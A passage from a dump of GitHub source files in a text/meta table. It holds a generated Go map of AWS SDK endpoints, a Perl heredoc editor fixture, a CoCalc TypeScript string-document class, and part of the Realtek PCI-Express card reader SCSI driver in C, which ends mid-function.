text
stringlengths 2
100k
| meta
dict |
---|---|
package endpoints
// THIS FILE IS AUTOMATICALLY GENERATED. DO NOT EDIT.
type endpointStruct struct {
Version int
Endpoints map[string]endpointEntry
}
type endpointEntry struct {
Endpoint string
SigningRegion string
}
var endpointsMap = endpointStruct{
Version: 2,
Endpoints: map[string]endpointEntry{
"*/*": {
Endpoint: "{service}.{region}.amazonaws.com",
},
"*/cloudfront": {
Endpoint: "cloudfront.amazonaws.com",
SigningRegion: "us-east-1",
},
"*/cloudsearchdomain": {
Endpoint: "",
SigningRegion: "us-east-1",
},
"*/data.iot": {
Endpoint: "",
SigningRegion: "us-east-1",
},
"*/ec2metadata": {
Endpoint: "http://169.254.169.254/latest",
},
"*/iam": {
Endpoint: "iam.amazonaws.com",
SigningRegion: "us-east-1",
},
"*/importexport": {
Endpoint: "importexport.amazonaws.com",
SigningRegion: "us-east-1",
},
"*/route53": {
Endpoint: "route53.amazonaws.com",
SigningRegion: "us-east-1",
},
"*/s3": {
Endpoint: "s3-{region}.amazonaws.com",
},
"*/s3/dualstack": {
Endpoint: "s3.dualstack.{region}.amazonaws.com",
},
"*/sts": {
Endpoint: "sts.amazonaws.com",
SigningRegion: "us-east-1",
},
"*/waf": {
Endpoint: "waf.amazonaws.com",
SigningRegion: "us-east-1",
},
"cn-north-1/*": {
Endpoint: "{service}.{region}.amazonaws.com.cn",
},
"cn-north-1/ec2metadata": {
Endpoint: "http://169.254.169.254/latest",
},
"eu-central-1/s3": {
Endpoint: "{service}.{region}.amazonaws.com",
},
"us-east-1/s3": {
Endpoint: "s3.amazonaws.com",
},
"us-east-1/sdb": {
Endpoint: "sdb.amazonaws.com",
SigningRegion: "us-east-1",
},
"us-gov-west-1/ec2metadata": {
Endpoint: "http://169.254.169.254/latest",
},
"us-gov-west-1/iam": {
Endpoint: "iam.us-gov.amazonaws.com",
},
"us-gov-west-1/s3": {
Endpoint: "s3-{region}.amazonaws.com",
},
"us-gov-west-1/sts": {
Endpoint: "sts.us-gov-west-1.amazonaws.com",
},
},
}
| {
"pile_set_name": "Github"
} |
say <<"EOM";
te<selection>st$variable</selection> blabla
EOM
say <<EOM;
other test$variable blabla
EOM
say <<'EOM';
other test$variable blabla
EOM
say <<`EOM`;
test$variable blabla
EOM
| {
"pile_set_name": "Github"
} |
/*
* This file is part of CoCalc: Copyright © 2020 Sagemath, Inc.
* License: AGPLv3 s.t. "Commons Clause" – see LICENSE.md for details
*/
import { CompressedPatch, Document } from "../generic/types";
import { apply_patch, make_patch } from "../generic/util";
// Immutable string document that satisfies our spec.
export class StringDocument implements Document {
private value: string;
constructor(value = "") {
this.value = value;
}
public to_str(): string {
return this.value;
}
public is_equal(other?: StringDocument): boolean {
return this.value === (other != null ? other.value : undefined);
}
public apply_patch(patch: CompressedPatch): StringDocument {
return new StringDocument(apply_patch(patch, this.value)[0]);
}
public make_patch(other: StringDocument): CompressedPatch {
return make_patch(this.value, other.value);
}
public set(x: any): StringDocument {
if (typeof x === "string") {
return new StringDocument(x);
}
throw Error("x must be a string");
}
public get(_?: any): any {
throw Error("get queries on strings don't have meaning");
}
public get_one(_?: any): any {
throw Error("get_one queries on strings don't have meaning");
}
public delete(_?: any): StringDocument {
throw Error("delete on strings doesn't have meaning");
}
public changes(_?: StringDocument): any {
// no-op (this is useful for other things, e.g., db-doc)
return;
}
public count(): number {
return this.value.length;
}
}
| {
"pile_set_name": "Github"
} |
/* Driver for Realtek PCI-Express card reader
*
* Copyright(c) 2009 Realtek Semiconductor Corp. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2, or (at your option) any
* later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, see <http://www.gnu.org/licenses/>.
*
* Author:
* wwang ([email protected])
* No. 450, Shenhu Road, Suzhou Industry Park, Suzhou, China
*/
#include <linux/blkdev.h>
#include <linux/kthread.h>
#include <linux/sched.h>
#include <linux/vmalloc.h>
#include "rtsx.h"
#include "rtsx_transport.h"
#include "rtsx_sys.h"
#include "rtsx_card.h"
#include "rtsx_chip.h"
#include "rtsx_scsi.h"
#include "sd.h"
#include "ms.h"
#include "spi.h"
void scsi_show_command(struct scsi_cmnd *srb)
{
char *what = NULL;
int i, unknown_cmd = 0;
switch (srb->cmnd[0]) {
case TEST_UNIT_READY: what = "TEST_UNIT_READY"; break;
case REZERO_UNIT: what = "REZERO_UNIT"; break;
case REQUEST_SENSE: what = "REQUEST_SENSE"; break;
case FORMAT_UNIT: what = "FORMAT_UNIT"; break;
case READ_BLOCK_LIMITS: what = "READ_BLOCK_LIMITS"; break;
case REASSIGN_BLOCKS: what = "REASSIGN_BLOCKS"; break;
case READ_6: what = "READ_6"; break;
case WRITE_6: what = "WRITE_6"; break;
case SEEK_6: what = "SEEK_6"; break;
case READ_REVERSE: what = "READ_REVERSE"; break;
case WRITE_FILEMARKS: what = "WRITE_FILEMARKS"; break;
case SPACE: what = "SPACE"; break;
case INQUIRY: what = "INQUIRY"; break;
case RECOVER_BUFFERED_DATA: what = "RECOVER_BUFFERED_DATA"; break;
case MODE_SELECT: what = "MODE_SELECT"; break;
case RESERVE: what = "RESERVE"; break;
case RELEASE: what = "RELEASE"; break;
case COPY: what = "COPY"; break;
case ERASE: what = "ERASE"; break;
case MODE_SENSE: what = "MODE_SENSE"; break;
case START_STOP: what = "START_STOP"; break;
case RECEIVE_DIAGNOSTIC: what = "RECEIVE_DIAGNOSTIC"; break;
case SEND_DIAGNOSTIC: what = "SEND_DIAGNOSTIC"; break;
case ALLOW_MEDIUM_REMOVAL: what = "ALLOW_MEDIUM_REMOVAL"; break;
case SET_WINDOW: what = "SET_WINDOW"; break;
case READ_CAPACITY: what = "READ_CAPACITY"; break;
case READ_10: what = "READ_10"; break;
case WRITE_10: what = "WRITE_10"; break;
case SEEK_10: what = "SEEK_10"; break;
case WRITE_VERIFY: what = "WRITE_VERIFY"; break;
case VERIFY: what = "VERIFY"; break;
case SEARCH_HIGH: what = "SEARCH_HIGH"; break;
case SEARCH_EQUAL: what = "SEARCH_EQUAL"; break;
case SEARCH_LOW: what = "SEARCH_LOW"; break;
case SET_LIMITS: what = "SET_LIMITS"; break;
case READ_POSITION: what = "READ_POSITION"; break;
case SYNCHRONIZE_CACHE: what = "SYNCHRONIZE_CACHE"; break;
case LOCK_UNLOCK_CACHE: what = "LOCK_UNLOCK_CACHE"; break;
case READ_DEFECT_DATA: what = "READ_DEFECT_DATA"; break;
case MEDIUM_SCAN: what = "MEDIUM_SCAN"; break;
case COMPARE: what = "COMPARE"; break;
case COPY_VERIFY: what = "COPY_VERIFY"; break;
case WRITE_BUFFER: what = "WRITE_BUFFER"; break;
case READ_BUFFER: what = "READ_BUFFER"; break;
case UPDATE_BLOCK: what = "UPDATE_BLOCK"; break;
case READ_LONG: what = "READ_LONG"; break;
case WRITE_LONG: what = "WRITE_LONG"; break;
case CHANGE_DEFINITION: what = "CHANGE_DEFINITION"; break;
case WRITE_SAME: what = "WRITE_SAME"; break;
case GPCMD_READ_SUBCHANNEL: what = "READ SUBCHANNEL"; break;
case READ_TOC: what = "READ_TOC"; break;
case GPCMD_READ_HEADER: what = "READ HEADER"; break;
case GPCMD_PLAY_AUDIO_10: what = "PLAY AUDIO (10)"; break;
case GPCMD_PLAY_AUDIO_MSF: what = "PLAY AUDIO MSF"; break;
case GPCMD_GET_EVENT_STATUS_NOTIFICATION:
what = "GET EVENT/STATUS NOTIFICATION"; break;
case GPCMD_PAUSE_RESUME: what = "PAUSE/RESUME"; break;
case LOG_SELECT: what = "LOG_SELECT"; break;
case LOG_SENSE: what = "LOG_SENSE"; break;
case GPCMD_STOP_PLAY_SCAN: what = "STOP PLAY/SCAN"; break;
case GPCMD_READ_DISC_INFO: what = "READ DISC INFORMATION"; break;
case GPCMD_READ_TRACK_RZONE_INFO:
what = "READ TRACK INFORMATION"; break;
case GPCMD_RESERVE_RZONE_TRACK: what = "RESERVE TRACK"; break;
case GPCMD_SEND_OPC: what = "SEND OPC"; break;
case MODE_SELECT_10: what = "MODE_SELECT_10"; break;
case GPCMD_REPAIR_RZONE_TRACK: what = "REPAIR TRACK"; break;
case 0x59: what = "READ MASTER CUE"; break;
case MODE_SENSE_10: what = "MODE_SENSE_10"; break;
case GPCMD_CLOSE_TRACK: what = "CLOSE TRACK/SESSION"; break;
case 0x5C: what = "READ BUFFER CAPACITY"; break;
case 0x5D: what = "SEND CUE SHEET"; break;
case GPCMD_BLANK: what = "BLANK"; break;
case REPORT_LUNS: what = "REPORT LUNS"; break;
case MOVE_MEDIUM: what = "MOVE_MEDIUM or PLAY AUDIO (12)"; break;
case READ_12: what = "READ_12"; break;
case WRITE_12: what = "WRITE_12"; break;
case WRITE_VERIFY_12: what = "WRITE_VERIFY_12"; break;
case SEARCH_HIGH_12: what = "SEARCH_HIGH_12"; break;
case SEARCH_EQUAL_12: what = "SEARCH_EQUAL_12"; break;
case SEARCH_LOW_12: what = "SEARCH_LOW_12"; break;
case SEND_VOLUME_TAG: what = "SEND_VOLUME_TAG"; break;
case READ_ELEMENT_STATUS: what = "READ_ELEMENT_STATUS"; break;
case GPCMD_READ_CD_MSF: what = "READ CD MSF"; break;
case GPCMD_SCAN: what = "SCAN"; break;
case GPCMD_SET_SPEED: what = "SET CD SPEED"; break;
case GPCMD_MECHANISM_STATUS: what = "MECHANISM STATUS"; break;
case GPCMD_READ_CD: what = "READ CD"; break;
case 0xE1: what = "WRITE CONTINUE"; break;
case WRITE_LONG_2: what = "WRITE_LONG_2"; break;
case VENDOR_CMND: what = "Realtek's vendor command"; break;
default: what = "(unknown command)"; unknown_cmd = 1; break;
}
if (srb->cmnd[0] != TEST_UNIT_READY) {
RTSX_DEBUGP("Command %s (%d bytes)\n", what, srb->cmd_len);
}
if (unknown_cmd) {
RTSX_DEBUGP("");
for (i = 0; i < srb->cmd_len && i < 16; i++)
RTSX_DEBUGPN(" %02x", srb->cmnd[i]);
RTSX_DEBUGPN("\n");
}
}
void set_sense_type(struct rtsx_chip *chip, unsigned int lun, int sense_type)
{
switch (sense_type) {
case SENSE_TYPE_MEDIA_CHANGE:
set_sense_data(chip, lun, CUR_ERR, 0x06, 0, 0x28, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_NOT_PRESENT:
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x3A, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_LBA_OVER_RANGE:
set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x21, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT:
set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x25, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_WRITE_PROTECT:
set_sense_data(chip, lun, CUR_ERR, 0x07, 0, 0x27, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR:
set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x11, 0, 0, 0);
break;
case SENSE_TYPE_MEDIA_WRITE_ERR:
set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x0C, 0x02, 0, 0);
break;
case SENSE_TYPE_MEDIA_INVALID_CMD_FIELD:
set_sense_data(chip, lun, CUR_ERR, ILGAL_REQ, 0,
ASC_INVLD_CDB, ASCQ_INVLD_CDB, CDB_ILLEGAL, 1);
break;
case SENSE_TYPE_FORMAT_IN_PROGRESS:
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04, 0, 0);
break;
case SENSE_TYPE_FORMAT_CMD_FAILED:
set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x31, 0x01, 0, 0);
break;
#ifdef SUPPORT_MAGIC_GATE
case SENSE_TYPE_MG_KEY_FAIL_NOT_ESTAB:
set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x6F, 0x02, 0, 0);
break;
case SENSE_TYPE_MG_KEY_FAIL_NOT_AUTHEN:
set_sense_data(chip, lun, CUR_ERR, 0x05, 0, 0x6F, 0x00, 0, 0);
break;
case SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM:
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x30, 0x00, 0, 0);
break;
case SENSE_TYPE_MG_WRITE_ERR:
set_sense_data(chip, lun, CUR_ERR, 0x03, 0, 0x0C, 0x00, 0, 0);
break;
#endif
#ifdef SUPPORT_SD_LOCK
case SENSE_TYPE_MEDIA_READ_FORBIDDEN:
set_sense_data(chip, lun, CUR_ERR, 0x07, 0, 0x11, 0x13, 0, 0);
break;
#endif
case SENSE_TYPE_NO_SENSE:
default:
set_sense_data(chip, lun, CUR_ERR, 0, 0, 0, 0, 0, 0);
break;
}
}
void set_sense_data(struct rtsx_chip *chip, unsigned int lun, u8 err_code, u8 sense_key,
u32 info, u8 asc, u8 ascq, u8 sns_key_info0, u16 sns_key_info1)
{
struct sense_data_t *sense = &(chip->sense_buffer[lun]);
sense->err_code = err_code;
sense->sense_key = sense_key;
sense->info[0] = (u8)(info >> 24);
sense->info[1] = (u8)(info >> 16);
sense->info[2] = (u8)(info >> 8);
sense->info[3] = (u8)info;
sense->ad_sense_len = sizeof(struct sense_data_t) - 8;
sense->asc = asc;
sense->ascq = ascq;
if (sns_key_info0 != 0) {
sense->sns_key_info[0] = SKSV | sns_key_info0;
sense->sns_key_info[1] = (sns_key_info1 & 0xf0) >> 8;
sense->sns_key_info[2] = sns_key_info1 & 0x0f;
}
}
static int test_unit_ready(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
return TRANSPORT_FAILED;
}
if (!(CHK_BIT(chip->lun_mc, lun))) {
SET_BIT(chip->lun_mc, lun);
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
return TRANSPORT_FAILED;
}
#ifdef SUPPORT_SD_LOCK
if (get_lun_card(chip, SCSI_LUN(srb)) == SD_CARD) {
struct sd_info *sd_card = &(chip->sd_card);
if (sd_card->sd_lock_notify) {
sd_card->sd_lock_notify = 0;
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
return TRANSPORT_FAILED;
} else if (sd_card->sd_lock_status & SD_LOCKED) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
return TRANSPORT_FAILED;
}
}
#endif
return TRANSPORT_GOOD;
}
static unsigned char formatter_inquiry_str[20] = {
'M', 'E', 'M', 'O', 'R', 'Y', 'S', 'T', 'I', 'C', 'K',
#ifdef SUPPORT_MAGIC_GATE
'-', 'M', 'G', /* Byte[47:49] */
#else
0x20, 0x20, 0x20, /* Byte[47:49] */
#endif
#ifdef SUPPORT_MAGIC_GATE
0x0B, /* Byte[50]: MG, MS, MSPro, MSXC */
#else
0x09, /* Byte[50]: MS, MSPro, MSXC */
#endif
0x00, /* Byte[51]: Category Specific Commands */
0x00, /* Byte[52]: Access Control and feature */
0x20, 0x20, 0x20, /* Byte[53:55] */
};
static int inquiry(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
char *inquiry_default = (char *)"Generic-xD/SD/M.S. 1.00 ";
char *inquiry_sdms = (char *)"Generic-SD/MemoryStick 1.00 ";
char *inquiry_sd = (char *)"Generic-SD/MMC 1.00 ";
char *inquiry_ms = (char *)"Generic-MemoryStick 1.00 ";
char *inquiry_string;
unsigned char sendbytes;
unsigned char *buf;
u8 card = get_lun_card(chip, lun);
int pro_formatter_flag = 0;
unsigned char inquiry_buf[] = {
QULIFIRE|DRCT_ACCESS_DEV,
RMB_DISC|0x0D,
0x00,
0x01,
0x1f,
0x02,
0,
REL_ADR|WBUS_32|WBUS_16|SYNC|LINKED|CMD_QUE|SFT_RE,
};
if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
if (chip->lun2card[lun] == SD_CARD) {
inquiry_string = inquiry_sd;
} else {
inquiry_string = inquiry_ms;
}
} else if (CHECK_LUN_MODE(chip, SD_MS_1LUN)) {
inquiry_string = inquiry_sdms;
} else {
inquiry_string = inquiry_default;
}
buf = vmalloc(scsi_bufflen(srb));
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
#ifdef SUPPORT_MAGIC_GATE
if ((chip->mspro_formatter_enable) &&
(chip->lun2card[lun] & MS_CARD))
#else
if (chip->mspro_formatter_enable)
#endif
{
if (!card || (card == MS_CARD)) {
pro_formatter_flag = 1;
}
}
if (pro_formatter_flag) {
if (scsi_bufflen(srb) < 56) {
sendbytes = (unsigned char)(scsi_bufflen(srb));
} else {
sendbytes = 56;
}
} else {
if (scsi_bufflen(srb) < 36) {
sendbytes = (unsigned char)(scsi_bufflen(srb));
} else {
sendbytes = 36;
}
}
if (sendbytes > 8) {
memcpy(buf, inquiry_buf, 8);
memcpy(buf + 8, inquiry_string, sendbytes - 8);
if (pro_formatter_flag) {
/* Additional Length */
buf[4] = 0x33;
}
} else {
memcpy(buf, inquiry_buf, sendbytes);
}
if (pro_formatter_flag) {
if (sendbytes > 36) {
memcpy(buf + 36, formatter_inquiry_str, sendbytes - 36);
}
}
scsi_set_resid(srb, 0);
rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
vfree(buf);
return TRANSPORT_GOOD;
}
static int start_stop_unit(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
scsi_set_resid(srb, scsi_bufflen(srb));
if (srb->cmnd[1] == 1)
return TRANSPORT_GOOD;
switch (srb->cmnd[0x4]) {
case STOP_MEDIUM:
/* Media disabled */
return TRANSPORT_GOOD;
case UNLOAD_MEDIUM:
/* Media shall be unload */
if (check_card_ready(chip, lun))
eject_card(chip, lun);
return TRANSPORT_GOOD;
case MAKE_MEDIUM_READY:
case LOAD_MEDIUM:
if (check_card_ready(chip, lun)) {
return TRANSPORT_GOOD;
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
}
TRACE_RET(chip, TRANSPORT_ERROR);
}
static int allow_medium_removal(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int prevent;
prevent = srb->cmnd[4] & 0x1;
scsi_set_resid(srb, 0);
if (prevent) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int request_sense(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct sense_data_t *sense;
unsigned int lun = SCSI_LUN(srb);
struct ms_info *ms_card = &(chip->ms_card);
unsigned char *tmp, *buf;
sense = &(chip->sense_buffer[lun]);
if ((get_lun_card(chip, lun) == MS_CARD) && ms_card->pro_under_formatting) {
if (ms_card->format_status == FORMAT_SUCCESS) {
set_sense_type(chip, lun, SENSE_TYPE_NO_SENSE);
ms_card->pro_under_formatting = 0;
ms_card->progress = 0;
} else if (ms_card->format_status == FORMAT_IN_PROGRESS) {
/* Logical Unit Not Ready Format in Progress */
set_sense_data(chip, lun, CUR_ERR, 0x02, 0, 0x04, 0x04,
0, (u16)(ms_card->progress));
} else {
/* Format Command Failed */
set_sense_type(chip, lun, SENSE_TYPE_FORMAT_CMD_FAILED);
ms_card->pro_under_formatting = 0;
ms_card->progress = 0;
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
}
buf = vmalloc(scsi_bufflen(srb));
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
tmp = (unsigned char *)sense;
memcpy(buf, tmp, scsi_bufflen(srb));
rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
vfree(buf);
scsi_set_resid(srb, 0);
/* Reset Sense Data */
set_sense_type(chip, lun, SENSE_TYPE_NO_SENSE);
return TRANSPORT_GOOD;
}
static void ms_mode_sense(struct rtsx_chip *chip, u8 cmd,
int lun, u8 *buf, int buf_len)
{
struct ms_info *ms_card = &(chip->ms_card);
int sys_info_offset;
int data_size = buf_len;
int support_format = 0;
int i = 0;
if (cmd == MODE_SENSE) {
sys_info_offset = 8;
if (data_size > 0x68) {
data_size = 0x68;
}
buf[i++] = 0x67; /* Mode Data Length */
} else {
sys_info_offset = 12;
if (data_size > 0x6C) {
data_size = 0x6C;
}
buf[i++] = 0x00; /* Mode Data Length (MSB) */
buf[i++] = 0x6A; /* Mode Data Length (LSB) */
}
/* Medium Type Code */
if (check_card_ready(chip, lun)) {
if (CHK_MSXC(ms_card)) {
support_format = 1;
buf[i++] = 0x40;
} else if (CHK_MSPRO(ms_card)) {
support_format = 1;
buf[i++] = 0x20;
} else {
buf[i++] = 0x10;
}
/* WP */
if (check_card_wp(chip, lun)) {
buf[i++] = 0x80;
} else {
buf[i++] = 0x00;
}
} else {
buf[i++] = 0x00; /* MediaType */
buf[i++] = 0x00; /* WP */
}
buf[i++] = 0x00; /* Reserved */
if (cmd == MODE_SENSE_10) {
buf[i++] = 0x00; /* Reserved */
buf[i++] = 0x00; /* Block descriptor length(MSB) */
buf[i++] = 0x00; /* Block descriptor length(LSB) */
/* The Following Data is the content of "Page 0x20" */
if (data_size >= 9)
buf[i++] = 0x20; /* Page Code */
if (data_size >= 10)
buf[i++] = 0x62; /* Page Length */
if (data_size >= 11)
buf[i++] = 0x00; /* No Access Control */
if (data_size >= 12) {
if (support_format) {
buf[i++] = 0xC0; /* SF, SGM */
} else {
buf[i++] = 0x00;
}
}
} else {
/* The Following Data is the content of "Page 0x20" */
if (data_size >= 5)
buf[i++] = 0x20; /* Page Code */
if (data_size >= 6)
buf[i++] = 0x62; /* Page Length */
if (data_size >= 7)
buf[i++] = 0x00; /* No Access Control */
if (data_size >= 8) {
if (support_format) {
buf[i++] = 0xC0; /* SF, SGM */
} else {
buf[i++] = 0x00;
}
}
}
if (data_size > sys_info_offset) {
/* 96 Bytes Attribute Data */
int len = data_size - sys_info_offset;
len = (len < 96) ? len : 96;
memcpy(buf + sys_info_offset, ms_card->raw_sys_info, len);
}
}
static int mode_sense(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
unsigned int dataSize;
int status;
int pro_formatter_flag;
unsigned char pageCode, *buf;
u8 card = get_lun_card(chip, lun);
#ifndef SUPPORT_MAGIC_GATE
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
scsi_set_resid(srb, scsi_bufflen(srb));
TRACE_RET(chip, TRANSPORT_FAILED);
}
#endif
pro_formatter_flag = 0;
dataSize = 8;
#ifdef SUPPORT_MAGIC_GATE
if ((chip->lun2card[lun] & MS_CARD)) {
if (!card || (card == MS_CARD)) {
dataSize = 108;
if (chip->mspro_formatter_enable) {
pro_formatter_flag = 1;
}
}
}
#else
if (card == MS_CARD) {
if (chip->mspro_formatter_enable) {
pro_formatter_flag = 1;
dataSize = 108;
}
}
#endif
buf = kmalloc(dataSize, GFP_KERNEL);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
pageCode = srb->cmnd[2] & 0x3f;
if ((pageCode == 0x3F) || (pageCode == 0x1C) ||
(pageCode == 0x00) ||
(pro_formatter_flag && (pageCode == 0x20))) {
if (srb->cmnd[0] == MODE_SENSE) {
if ((pageCode == 0x3F) || (pageCode == 0x20)) {
ms_mode_sense(chip, srb->cmnd[0],
lun, buf, dataSize);
} else {
dataSize = 4;
buf[0] = 0x03;
buf[1] = 0x00;
if (check_card_wp(chip, lun)) {
buf[2] = 0x80;
} else {
buf[2] = 0x00;
}
buf[3] = 0x00;
}
} else {
if ((pageCode == 0x3F) || (pageCode == 0x20)) {
ms_mode_sense(chip, srb->cmnd[0],
lun, buf, dataSize);
} else {
dataSize = 8;
buf[0] = 0x00;
buf[1] = 0x06;
buf[2] = 0x00;
if (check_card_wp(chip, lun)) {
buf[3] = 0x80;
} else {
buf[3] = 0x00;
}
buf[4] = 0x00;
buf[5] = 0x00;
buf[6] = 0x00;
buf[7] = 0x00;
}
}
status = TRANSPORT_GOOD;
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
scsi_set_resid(srb, scsi_bufflen(srb));
status = TRANSPORT_FAILED;
}
if (status == TRANSPORT_GOOD) {
unsigned int len = min(scsi_bufflen(srb), dataSize);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
}
kfree(buf);
return status;
}
static int read_write(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
#ifdef SUPPORT_SD_LOCK
struct sd_info *sd_card = &(chip->sd_card);
#endif
unsigned int lun = SCSI_LUN(srb);
int retval;
u32 start_sec;
u16 sec_cnt;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
if (!check_card_ready(chip, lun) || (get_card_size(chip, lun) == 0)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (!(CHK_BIT(chip->lun_mc, lun))) {
SET_BIT(chip->lun_mc, lun);
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
return TRANSPORT_FAILED;
}
#ifdef SUPPORT_SD_LOCK
if (sd_card->sd_erase_status) {
/* Accessing to any card is forbidden
* until the erase procedure of SD is completed
*/
RTSX_DEBUGP("SD card being erased!\n");
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (get_lun_card(chip, lun) == SD_CARD) {
if (sd_card->sd_lock_status & SD_LOCKED) {
RTSX_DEBUGP("SD card locked!\n");
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_READ_FORBIDDEN);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
#endif
if ((srb->cmnd[0] == READ_10) || (srb->cmnd[0] == WRITE_10)) {
start_sec = ((u32)srb->cmnd[2] << 24) | ((u32)srb->cmnd[3] << 16) |
((u32)srb->cmnd[4] << 8) | ((u32)srb->cmnd[5]);
sec_cnt = ((u16)(srb->cmnd[7]) << 8) | srb->cmnd[8];
} else if ((srb->cmnd[0] == READ_6) || (srb->cmnd[0] == WRITE_6)) {
start_sec = ((u32)(srb->cmnd[1] & 0x1F) << 16) |
((u32)srb->cmnd[2] << 8) | ((u32)srb->cmnd[3]);
sec_cnt = srb->cmnd[4];
} else if ((srb->cmnd[0] == VENDOR_CMND) && (srb->cmnd[1] == SCSI_APP_CMD) &&
((srb->cmnd[2] == PP_READ10) || (srb->cmnd[2] == PP_WRITE10))) {
start_sec = ((u32)srb->cmnd[4] << 24) | ((u32)srb->cmnd[5] << 16) |
((u32)srb->cmnd[6] << 8) | ((u32)srb->cmnd[7]);
sec_cnt = ((u16)(srb->cmnd[9]) << 8) | srb->cmnd[10];
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
/* In some test, we will receive a start_sec like 0xFFFFFFFF.
* In this situation, start_sec + sec_cnt will overflow, so we
* need to judge start_sec at first
*/
if ((start_sec > get_card_size(chip, lun)) ||
((start_sec + sec_cnt) > get_card_size(chip, lun))) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LBA_OVER_RANGE);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (sec_cnt == 0) {
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
if (chip->rw_fail_cnt[lun] == 3) {
RTSX_DEBUGP("read/write fail three times in succession\n");
if (srb->sc_data_direction == DMA_FROM_DEVICE) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
}
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (srb->sc_data_direction == DMA_TO_DEVICE) {
if (check_card_wp(chip, lun)) {
RTSX_DEBUGP("Write protected card!\n");
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (CHECK_PID(chip, 0x5209) && chip->max_payload) {
u8 val = 0x10 | (chip->max_payload << 5);
retval = rtsx_write_cfg_dw(chip, 0, 0x78, 0xFF, val);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
}
}
retval = card_rw(srb, chip, start_sec, sec_cnt);
if (retval != STATUS_SUCCESS) {
if (chip->need_release & chip->lun2card[lun]) {
chip->rw_fail_cnt[lun] = 0;
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
} else {
chip->rw_fail_cnt[lun]++;
if (srb->sc_data_direction == DMA_FROM_DEVICE) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
}
}
retval = TRANSPORT_FAILED;
TRACE_GOTO(chip, Exit);
} else {
chip->rw_fail_cnt[lun] = 0;
retval = TRANSPORT_GOOD;
}
scsi_set_resid(srb, 0);
Exit:
if (srb->sc_data_direction == DMA_TO_DEVICE) {
